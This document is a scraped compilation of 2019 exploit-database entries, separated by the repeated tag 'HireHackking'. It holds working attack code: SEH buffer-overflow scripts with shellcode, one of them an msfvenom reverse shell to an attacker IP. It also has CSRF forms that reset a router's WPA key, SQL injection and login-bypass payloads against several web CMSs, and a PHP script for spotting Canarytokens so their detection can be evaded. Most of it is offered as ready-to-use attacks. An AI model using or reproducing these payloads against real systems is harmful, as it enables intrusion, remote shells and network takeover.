# Date: 2019-03-19
# Vendor Homepage: http://netsharewatcher.nsauditor.com
# Software Link:  http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
# Exploit Author: Peyman Forouzan
# Tested Version: 1.5.8.0
# Tested on: Windows XP SP2 - SP3

# 1- Run python code : NetShareWatcher.py
# 2- Open Exploit.txt and copy content to clipboard
# 3- Open NetShareWatcher
# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
# 5- Paste the content of Exploit.txt into the box
# 6- Click 'Find'
# 7- Calc.exe Open ( Can be replaced with Shellcode )

#!/usr/bin/python

buffer = "\x41" * 262
nseh = "\xeb\x14\x90\x90"  # Overwrite Next Seh With Short jmp
seh = "\x90\xBF\xC9\x74"   # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
nops = "\x90" * 20

# Calc.exe payload [size 227]
buf =""
buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
buf += "\x9a\xca\xc0";

payload = buffer + nseh + seh + nops + buf
try:
    f=open("Exploit.txt","w")
    print "[+] Creating %s bytes payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File can't be created"
HireHackking 
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)
# Date: 14/01/2019
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6282

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware
W2001EN-00 have CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.

#Reproduction Steps:

Note: This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.

Step 1: User login to PLC wireless router

Step 2: User visits the attacker's malicious web page (PLC_CSRF.html)

Step 3: PLC_CSRF.html exploits CSRF vulnerability and changes the wireless Security (WPA/WPA2) key to "PSWDmatlo331#@!"

Step 4: (192.168.59.254 in my Case)

<html>
<body>
  <form method="POST" action="http://192.168.59.254:80/cgi-bin/webproc">
    <input type="text" name="sessionid" value="2a39a09e">
    <input type="text" name="language" value="en_us">
    <input type="text" name="sys_UserName" value="admin">
    <input type="text" name="var:menu" value="setup">
    <input type="text" name="var:page" value="wireless">
    <input type="text" name="var:subpage" value="wlsecurity">
    <input type="text" name="var:errorpage" value="wlsecurity">
    <input type="text" name="getpage" value="html/index.html">
    <input type="text" name="errorpage" value="html/index.html">
    <input type="text" name="var:arrayid" value="0">
    <input type="text" name="obj-action" value="set">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType" value="11i">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes" value="AESEncryption">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode" value="PSKAuthentication">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey" value="100">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase" value="PSWDmatlo331#@!">
    <input type="text" name=":InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression" value="KeyPassphrase">
    <input type="submit" value="Send">
  </form>
</body>
</html>
HireHackking 
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access
Control
# Date: 14/01/2019
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Windows
# CVE : CVE-2019-6279

#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with
firmware
W2001EN-00 have an Incorrect Access Control vulnerability via the
cgi-bin/webproc?getpage=html/index.html
subpage=wlsecurity URI, allowing an Attacker to change the Wireless
Security Password.

Reproduction Steps:
Step 1: Building a malicious html web page
Step 2: Attacker’s wants to change the wireless security (WPA/WPA2) key to
“PSWDmatlo331#@!” (in my case)

Step 3: (192.168.59.254 in my Case)
<html>
<body>
<form method=”POST” action=”http://192.168.59.254:80/cgi-bin/webproc “>
<input type=”text” name=”sessionid” value=”2a39a09e”>
<input type=”text” name=”language” value=”en_us”>
<input type=”text” name=”sys_UserName” value=”admin”>
<input type=”text” name=”var:menu” value=”setup”>
<input type=”text” name=”var:page” value=”wireless”>
<input type=”text” name=”var:subpage” value=”wlsecurity”>
<input type=”text” name=”var:errorpage” value=”wlsecurity”>
<input type=”text” name=”getpage” value=”html/index.html”>
<input type=”text” name=”errorpage” value=”html/index.html”>
<input type=”text” name=”var:arrayid” value=”0?>
<input type=”text” name=”obj-action” value=”set”>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.BeaconType ”
value=”11i”>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iEncryptionModes”
value=”AESEncryption”>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.IEEE11iAuthenticationMode”
value=”PSKAuthentication”>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_WPAGroupRekey”
value=”100?>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.PreSharedKey.1.KeyPassphrase”
value=”PSWDmatlo331#@!”>
<input type=”text”
name=”:InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.X_TWSZ-COM_PSKExpression”
value=”KeyPassphrase”>
<input type=”submit” value=”Send”>
</form>
</body>
</html>

Step 4: save this as Incorrect_Access_Control.html
Step 5: Planting this malicious web page (Incorrect_Access_Control.html)
that are likely to be visited by the victim’s (by social engineering) or
any user connected in the Access Point (AP) will have to visit this page or
any attacker’s connected in the AP will trigger this exploit.
Step 6: After execution of above exploit, wireless security (WPA/WPA2) key
will change!!

Note: This vulnerability allowing an attacker to reproduce without login.
HireHackking 
# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/dealsportal/
# Demo Site: https://www.phpscriptdemos.com/deals/i
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/loginaction.php
# Vulnerable Parameter: Email (POST)
# Attack Pattern:
Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
HireHackking 
# Exploit Title: Netartmedia Vlog System - 'email' SQL Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.netartmedia.net/vlogsystem/
# Demo Site: https://www.phpscriptdemos.com/vlogs/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: SQLi -----
# Request: http://localhost/[PATH]/index.php
# Vulnerable Parameter: email (POST)
# Attack
Pattern: ProceedSend=1&email=-1'%20OR%203*2*1=6%20AND%20000371=000371%20--%20&mod=forgotten_password
HireHackking 
#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 
#   In Windows 7, SEH handler to be used contains a \x00 byte that it has been
#   obtained using a restricted char. For such a reason, every jump has to be
#   backward on the beginning of attacking shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode

shellcode = ""
shellcode += "\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
shellcode += "\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
shellcode += "\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
shellcode += "\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
shellcode += "\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
shellcode += "\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
shellcode += "\x6b\xc2\x36"

junk = "\x90" * (600 -len(shellcode))
junk += shellcode

# nasm > jmp $-400
# 00000000  E96BFEFFFF        jmp 0xfffffe70
backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
junk += backflip

# 00401838  |. 5E             POP ESI
junk += "\xeb\xf6\x90\x90"
junk += "\x38\x18\x40\x1a"

file = open("evil_playlist.plf", "w")
file.write(junk)
file.close()
HireHackking 
## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Date: 20.03.2019
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale 
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A 
# CVE: 2019-9768 
#==================================================================================================================================================================================
# PoC:
#
#
#
# Requires unzip:
#
# sudo apt-get install unzip
#
#


<?php
 
system('unzip ' . $argv[1] . '.docx');
 
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
 
$strFile = file_get_contents("docProps/core.xml");
 
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
{
     echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
}
else
{
     echo "Should be safe to open normally";
}
?>
HireHackking 
Placeto CMS Alpha v4 - 'page' SQL Injection

# Title: Placeto CMS
# Date: 21.03.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://sourceforge.net/projects/placeto/
# Software Link: https://sourceforge.net/projects/placeto/files/alpha-rv.4/placeto.zip
# Version: Alpha rv.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
A lightweight, easy to use PHP content management system (CMS). Written to
be fast and to use as little memory as possible. Placeto CMS offers browser
and server caching, provides gzip compression and to cut down on bandwidth
and CPU time.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.


# POC - SQLi :

# Parameter: page (GET)
# Request URL: http://localhost/placeto/admin/edit.php?page=key

#    Type : boolean-based blind
page=JyI" AND 1647=1647 AND "svwN"="svwN

#    Type : time-based blind
page=JyI" AND SLEEP(5) AND "uIvY"="uIvY

#    Type : union query
page=-8388" UNION ALL SELECT
NULL,CONCAT(0x716b627671,0x6a636f485445445466517a4a6f6972635551635179725550617072647371784f6445576b74736849,0x716b6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
CbSf
HireHackking 
# Exploit Title: uHotelBooking System - 'system_page' SQL Injection
# Date: 21.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.hotel-booking-script.com
# Demo Site: https://www.hotel-booking-script.com/demo/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
# Description: uHotelBooking is a powerful hotel management and online
booking/reservation site script.

----- PoC: SQLi -----

Request: http://localhost/[PATH]/index.php
Vulnerable Parameter: system_page (GET)
Attack Pattern:
http://locahost/[PATH]/index.php?page=3&system_page=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z
HireHackking 
# Exploit Title: The Company Business Website CMS - 'user_name' SQL
Injection
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/production/login.php
Vulnerable Parameter: user_name (POST)
Payload: user_name=VNfn' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(CONCAT('qqkxq','mOiFXJaJzzATyiPlJyQgwuuTiDddtckLMPRRRdEH'),'qjbbq'),NULL,NULL,NULL,NULL--
WMfV&user_password=&loggin=Psop


# Exploit Title: The Company Business Website CMS - Authentication Bypass
# Date: 20.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms
# Demo Site: http://thecompany.morkocbilisim.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A
----- PoC: Authentication Bypass -----
Administration Panel: http://localhost/[PATH]/admin/production/login.php
Username: '=' 'or'
Password: '=' 'or'